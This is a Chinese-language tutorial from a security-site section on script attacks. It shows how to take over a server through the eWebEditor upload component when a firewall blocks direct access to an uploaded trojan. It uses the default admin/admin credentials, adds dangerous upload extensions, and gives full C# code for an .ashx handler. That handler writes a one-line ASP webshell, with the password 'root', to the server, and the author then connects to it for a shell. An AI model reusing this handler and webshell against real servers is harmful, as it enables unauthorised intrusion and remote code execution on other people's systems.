服务器 > 网络安全 > 脚本攻防

ewebeditor 上传遇到防火墙限制的解决办法 图文

45人参与 2011-05-10 脚本攻防

这是一个eweb入口(废话)
1.jpg

 

用默认帐户密码admin admin进入


2.jpg

 

样式添加asa扩展名


3.jpg

 

直接上传asp马


4.jpg

 

到这里都是顺利的,但是。。当你访问马的时候。。


5.jpg

 

试过了小马,一句话,会出现同样的问题

 

解决方法:

 

在样式添加里加上扩展名ashx

 

创建一个1.ashx的文件, 上传,代码如下:


复制代码
代码如下:

<%@ webhandler language="c#" class="handler" %>
using system;
using system.web;
using system.io;
public class handler : ihttphandler {
public void processrequest (httpcontext context) {
context.response.contenttype = "text/plain";
streamwriter file1= file.createtext(context.server.mappath("root.asp"));
file1.write("<%response.clear:execute request(\"root\"):response.end%>");
file1.flush();
file1.close();
}
public bool isreusable {
get {return false; }
}
}
然后直接访问它。。


6.jpg

 

它会在当前目录生成一个root.asp的一句话木马,密码为root


7.jpg

 

然后连接一句话木马就可以啦~~


8.jpg

 

拿到shell


9.jpg

(0)
打赏 微信扫一扫 微信扫一扫

您想发表意见!!点此发布评论

推荐阅读

Phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞

05-10

用JavaScript防止网站被挂IFRAME木马的方法

05-01

网站后台脚本漏洞挖掘技巧,基于工具快速挖掘

05-15

防止网站被JS,iframe挂马的防范方法

05-01

php版shell.users加管理员帐号的方法

06-15

脚本入侵-上传漏洞总结篇(臭小子)

04-24

猜你喜欢

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论